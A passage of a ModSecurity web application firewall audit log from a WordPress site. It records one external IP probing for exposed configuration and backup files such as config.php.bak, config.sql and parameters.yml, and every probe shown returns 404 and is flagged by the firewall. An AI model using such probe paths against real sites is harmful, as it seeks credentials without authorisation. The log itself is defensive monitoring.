Server: Apache Engine-Mode: "DETECTION_ONLY" --fe86e917-Z-- --a0583369-A-- [15/Jun/2025:02:58:47.218357 +0530] aE3pjfBViRrxRfhQ2snRYAAAAAE 185.177.72.108 39562 127.0.0.1 7081 --a0583369-B-- GET /config.inc HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a0583369-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --a0583369-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.inc"] [unique_id "aE3pjfBViRrxRfhQ2snRYAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936525691116 1527309 (- - -) Stopwatch2: 1749936525691116 1527309; combined=2190, p1=418, p2=1664, p3=0, p4=0, p5=107, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0583369-Z-- --9b4d8853-A-- [15/Jun/2025:02:58:49.178994 +0530] aE3pj-Qxpfcsz2uNnR-j7wAAAAI 185.177.72.108 39642 127.0.0.1 7081 --9b4d8853-B-- GET /config.inc.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9b4d8853-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --9b4d8853-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.inc.bak"] [unique_id "aE3pj-Qxpfcsz2uNnR-j7wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936527636899 1542173 (- - -) Stopwatch2: 1749936527636899 1542173; combined=1864, p1=338, p2=1427, p3=0, p4=0, p5=98, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9b4d8853-Z-- --a4ddd142-A-- [15/Jun/2025:02:58:51.150202 +0530] aE3pkdlaOcxgn8EdjwOwSAAAAAc 185.177.72.108 55374 127.0.0.1 7081 --a4ddd142-B-- GET /config.inc.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4ddd142-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --a4ddd142-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.inc.old"] [unique_id "aE3pkdlaOcxgn8EdjwOwSAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936529622796 1527494 (- - -) Stopwatch2: 1749936529622796 1527494; combined=2026, p1=315, p2=1600, p3=0, p4=0, p5=110, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4ddd142-Z-- --099da327-A-- [15/Jun/2025:02:59:03.156468 +0530] aE3pneQxpfcsz2uNnR-j9AAAAAI 185.177.72.108 36030 127.0.0.1 7081 --099da327-B-- GET /config.ini.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --099da327-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --099da327-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.ini.bak"] [unique_id "aE3pneQxpfcsz2uNnR-j9AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936541668415 1488121 (- - -) Stopwatch2: 1749936541668415 1488121; combined=2352, p1=374, p2=1844, p3=0, p4=0, p5=113, sr=92, sw=21, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --099da327-Z-- --274e4773-A-- [15/Jun/2025:02:59:05.319034 +0530] aE3pnzpSduy_dUF9ffnEBAAAAAU 185.177.72.108 36090 127.0.0.1 7081 --274e4773-B-- GET /config.ini.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --274e4773-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --274e4773-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.ini.old"] [unique_id "aE3pnzpSduy_dUF9ffnEBAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936543578826 1740299 (- - -) Stopwatch2: 1749936543578826 1740299; combined=2392, p1=365, p2=1913, p3=0, p4=0, p5=113, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --274e4773-Z-- --f00de90e-A-- [15/Jun/2025:02:59:15.346484 +0530] aE3pqSQOy0yoNZQ7dslN8QAAAAk 185.177.72.108 34240 127.0.0.1 7081 --f00de90e-B-- GET /config.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f00de90e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --f00de90e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.old"] [unique_id "aE3pqSQOy0yoNZQ7dslN8QAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936553772304 1574252 (- - -) Stopwatch2: 1749936553772304 1574252; combined=1720, p1=344, p2=1289, p3=0, p4=0, p5=86, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f00de90e-Z-- --7827541e-A-- [15/Jun/2025:02:59:21.227562 +0530] aE3pr-Jd8bjNT3a5_F4HOAAAAA4 185.177.72.108 51140 127.0.0.1 7081 --7827541e-B-- GET /config.php.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7827541e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --7827541e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.php.bak"] [unique_id "aE3pr-Jd8bjNT3a5_F4HOAAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936559678309 1549337 (- - -) Stopwatch2: 1749936559678309 1549337; combined=2349, p1=395, p2=1858, p3=0, p4=0, p5=95, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7827541e-Z-- --aeb75521-A-- [15/Jun/2025:02:59:25.573582 +0530] aE3ps9C7wXmuvKRT4TofrgAAAA8 185.177.72.108 51340 127.0.0.1 7081 --aeb75521-B-- GET /config.php.inc HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aeb75521-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --aeb75521-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.php.inc"] [unique_id "aE3ps9C7wXmuvKRT4TofrgAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936563810326 1763346 (- - -) Stopwatch2: 1749936563810326 1763346; combined=2062, p1=365, p2=1572, p3=0, p4=0, p5=125, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeb75521-Z-- --abcca66c-A-- [15/Jun/2025:02:59:29.887076 +0530] aE3puCQOy0yoNZQ7dslN9gAAAAk 185.177.72.108 51434 127.0.0.1 7081 --abcca66c-B-- GET /config.php.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --abcca66c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --abcca66c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.php.old"] [unique_id "aE3puCQOy0yoNZQ7dslN9gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936568280373 1606787 (- - -) Stopwatch2: 1749936568280373 1606787; combined=1816, p1=418, p2=1296, p3=0, p4=0, p5=102, sr=146, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abcca66c-Z-- --97dc7864-A-- [15/Jun/2025:02:59:43.923505 +0530] aE3pxhkoa9Lad8nP7KNyzQAAABA 185.177.72.108 38508 127.0.0.1 7081 --97dc7864-B-- GET /config.sql HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --97dc7864-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --97dc7864-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.sql"] [unique_id "aE3pxhkoa9Lad8nP7KNyzQAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936582420070 1503510 (- - -) Stopwatch2: 1749936582420070 1503510; combined=1655, p1=341, p2=1211, p3=0, p4=0, p5=102, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --97dc7864-Z-- --3a57d11b-A-- [15/Jun/2025:02:59:55.620287 +0530] aE3p0tC7wXmuvKRT4TofuwAAAA8 185.177.72.108 44002 127.0.0.1 7081 --3a57d11b-B-- GET /config.properties.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3a57d11b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --3a57d11b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.properties.bak"] [unique_id "aE3p0tC7wXmuvKRT4TofuwAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936594112687 1507693 (- - -) Stopwatch2: 1749936594112687 1507693; combined=1684, p1=324, p2=1263, p3=0, p4=0, p5=96, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a57d11b-Z-- --c75bbb0a-A-- [15/Jun/2025:03:01:48.493992 +0530] aE3qQp4hb3-ZG-auIyDOtQAAAAg 185.177.72.108 46334 127.0.0.1 7081 --c75bbb0a-B-- GET /app.config HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c75bbb0a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --c75bbb0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/app.config"] [unique_id "aE3qQp4hb3-ZG-auIyDOtQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936706952804 1541258 (- - -) Stopwatch2: 1749936706952804 1541258; combined=2412, p1=446, p2=1858, p3=0, p4=0, p5=107, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c75bbb0a-Z-- --45ec4a2b-A-- [15/Jun/2025:03:02:06.002289 +0530] aE3qVLhvrRrlmSOg3-9tTQAAAAw 185.177.72.108 52648 127.0.0.1 7081 --45ec4a2b-B-- GET /app/config/parameters.yml HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --45ec4a2b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; 